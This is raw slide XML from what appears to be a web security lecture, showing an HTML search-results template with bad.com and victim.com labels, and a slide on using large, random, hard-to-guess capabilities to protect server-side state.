          <p:cNvPr id="8" name="object 8">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{03685A59-31F5-534D-9049-BB2F8D2061F4}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4205288" y="5313363"/>
            <a:ext cx="4202112" cy="369887"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="0" tIns="0" rIns="0" bIns="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:tabLst>
                <a:tab pos="2775821" algn="l"/>
              </a:tabLst>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr sz="2400" b="1" spc="-4" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>Searc</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" b="1" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>h results</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2400" b="1" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="CB3FFF"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>&lt;/title&gt;</a:t>
            </a:r>
            <a:endParaRPr sz="2400" b="1" dirty="0">
              <a:latin typeface="Courier New"/>
              <a:cs typeface="Courier New"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9" name="object 9">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{38903248-6802-DA4A-B024-0EAE94E6EDC1}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1463675" y="5313363"/>
            <a:ext cx="2009775" cy="1139825"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="0" tIns="0" rIns="0" bIns="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPts val="2906"/>
              </a:lnSpc>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr sz="2400" b="1" spc="-4" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="CB3FFF"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>&lt;html&gt;</a:t>
            </a:r>
            <a:endParaRPr sz="2400" b="1" dirty="0">
              <a:latin typeface="Courier New"/>
              <a:cs typeface="Courier New"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPts val="2899"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="102"/>
              </a:spcBef>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr sz="2400" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="CB3FFF"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>&lt;body&gt;  </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" b="1" spc="-4" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>Results</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" b="1" spc="-74" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" b="1" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>for</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="168970" name="object 10">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E2D2A277-D493-F541-A51F-FD9083B74FB6}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="4752975" y="6062663"/>
            <a:ext cx="182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400">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>:</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="168971" name="object 11">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9D91EE1A-14A5-4D46-91A2-85D9D9B83BEB}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1463675" y="6437313"/>
            <a:ext cx="25574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tabLst>
                <a:tab pos="369888" algn="l"/>
                <a:tab pos="739775" algn="l"/>
              </a:tabLst>
              <a:defRPr>
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
              </a:defRPr>
            </a:lvl1pPr>
            <a:lvl2pPr marL="742950" indent="-285750">
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:tabLst>
                <a:tab pos="369888" algn="l"/>
                <a:tab pos="739775" algn="l"/>
              </a:tabLst>
              <a:defRPr>
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
              </a:defRPr>
            </a:lvl2pPr>
            <a:lvl3pPr marL="1143000" indent="-228600">
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:tabLst>
                <a:tab pos="369888" algn="l"/>
                <a:tab pos="739775" algn="l"/>
              </a:tabLst>
              <a:defRPr>
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
              </a:defRPr>
            </a:lvl3pPr>
            <a:lvl4pPr marL="1600200" indent="-228600">
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:tabLst>
                <a:tab pos="369888" algn="l"/>
                <a:tab pos="739775" algn="l"/>
              </a:tabLst>
              <a:defRPr>
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
              </a:defRPr>
            </a:lvl4pPr>
            <a:lvl5pPr marL="2057400" indent="-228600">
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:tabLst>
                <a:tab pos="369888" algn="l"/>
                <a:tab pos="739775"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9pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPts val="2900"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2400" b="1">
                <a:solidFill>
                  <a:srgbClr val="020002"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>.	.	.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="en-US" sz="2400" b="1">
              <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPts val="2900"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2400" b="1">
                <a:solidFill>
                  <a:srgbClr val="C840FF"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>&lt;/body&gt;&lt;/html&gt;</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="en-US" sz="2400" b="1">
              <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="12" name="object 12">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E107C94F-DA73-1D4B-B1DE-494E6381B331}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3408363" y="3409950"/>
            <a:ext cx="4440237" cy="431800"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="0" tIns="0" rIns="0" bIns="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="9949">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr sz="2800" spc="27" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Input </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2800" spc="-16" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>from</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2800" spc="-51" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2800" spc="55" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>bad.com:</a:t>
            </a:r>
            <a:endParaRPr sz="2800" dirty="0">
              <a:latin typeface="Arial"/>
              <a:cs typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="13" name="object 13">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{684004DB-B40A-2741-8633-5ECFCAC966F4}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3173413" y="4837113"/>
            <a:ext cx="5208587" cy="431800"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="0" tIns="0" rIns="0" bIns="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="9949">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr sz="2800" spc="-27" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Result </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2800" spc="-16" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>from</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2800" spc="-20" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2800" spc="27" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>victim.com:</a:t>
            </a:r>
            <a:endParaRPr sz="28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570A215-CC42-F548-B3A3-B0272D926ABC}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="771525" y="812800"/>
            <a:ext cx="8515350" cy="957263"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="560989" eaLnBrk="1" fontAlgn="auto" hangingPunct="1">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr sz="6100" spc="-25" dirty="0"/>
              <a:t>Solution:</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="6100" spc="-45" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="6100" i="1" spc="70" dirty="0"/>
              <a:t>Capabilities</a:t>
            </a:r>
            <a:endParaRPr sz="6100"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="object 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5AAC90E2-37AF-3D45-AC4D-23F012E7D1B1}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="763588" y="2547938"/>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BAF267B0-43C9-5845-82AD-81D401D7FE7A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1104900" y="2495550"/>
            <a:ext cx="4819650" cy="415925"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="0" tIns="0" rIns="0" bIns="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="12676" eaLnBrk="1" fontAlgn="auto" hangingPunct="1">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr sz="2700" spc="-10" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Server </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2700" spc="15" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>maintains </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2700" b="1" i="1" spc="15" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0365C0"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>trusted</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2700" b="1" i="1" spc="-65" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0365C0"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2700" spc="15" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>state</a:t>
            </a:r>
            <a:endParaRPr sz="2700">
              <a:latin typeface="Arial"/>
              <a:cs typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="object 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{53172C1E-E2F2-254C-B9EE-950D7CB4256C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1106488" y="311785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5BCA1C8A-5F01-AA40-824C-E3197CE07785}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1106488" y="3687763"/>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7" name="object 7">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A368A014-5C8C-634D-ABCA-D9FC1B625C31}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1106488" y="4257675"/>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30728" name="object 8">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5E666045-FCC1-4744-8DCB-11E011F667A5}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1447800" y="3067050"/>
            <a:ext cx="774382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700">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Server stores intermediate state</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="133000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="100"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2700">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Send a pointer to that state (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2700" b="1">
                <a:solidFill>
                  <a:srgbClr val="0365C0"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>capability</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2700">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>) to client  Client </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2700" b="1">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>references </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2700">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>the capability in next response</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9" name="object 9">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7CDA2EFD-56C7-BB4C-A5BD-B71F310AD066}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="763588" y="5092700"/>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19B036DD-B23D-DB47-B7AF-9630A5B78BBA}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1104900" y="5035550"/>
            <a:ext cx="5978525" cy="415925"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="0" tIns="0" rIns="0" bIns="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="12676" eaLnBrk="1" fontAlgn="auto" hangingPunct="1">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr sz="2700" spc="40" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Capabilities should </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2700" spc="95" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>be </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2700" b="1" spc="15" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>hard to</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2700" b="1" spc="-220" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2700" b="1" spc="15" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>guess</a:t>
            </a:r>
            <a:endParaRPr sz="2700">
              <a:latin typeface="Arial"/>
              <a:cs typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="11" name="object 11">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D6905689-B362-4347-97F9-D82BF721D718}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1106488" y="5662613"/>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2" name="object 12">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{102E2AB7-27E7-784D-8395-5EB3E0D1A11A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1106488" y="623093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3" name="object 13">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D5783D51-F583-EC4A-9BD4-0CA165A30662}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1447800" y="5607050"/>
            <a:ext cx="5778500" cy="1016000"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="0" tIns="0" rIns="0" bIns="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="12676" eaLnBrk="1" fontAlgn="auto" hangingPunct="1">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr sz="2700" spc="40" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Large, random</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2700" spc="-80" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2700" spc="40" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>numbers</a:t>
            </a:r>
            <a:endParaRPr sz="2700" dirty="0">
              <a:latin typeface="Arial"/>
              <a:cs typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="12676" eaLnBrk="1" fontAlgn="auto" hangingPunct="1">
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr sz="2700" spc="-215" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>To </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2700" spc="30" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>prevent illegal </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2700" spc="65" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>access </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2700" spc="10" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>to </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2700" spc="15" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>the</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2700" spc="110" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2700" spc="15" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>state</a:t>
            </a:r>
            <a:endParaRPr sz="2700" dirty="0">
              <a:latin typeface="Arial"/>
              <a:cs typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="14" name="TextBox 13">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6562E5A8-3CBD-8040-A015-4F7DB54491B0}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="152400" y="6900863"/>
            <a:ext cx="9872663" cy="854075"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" lIns="91279" tIns="45637" rIns="91279" bIns="45637">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" fontAlgn="auto" hangingPunct="1">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" i="1" dirty="0">
                <a:latin typeface="+mn-lt"/>
                <a:cs typeface="+mn-cs"/>
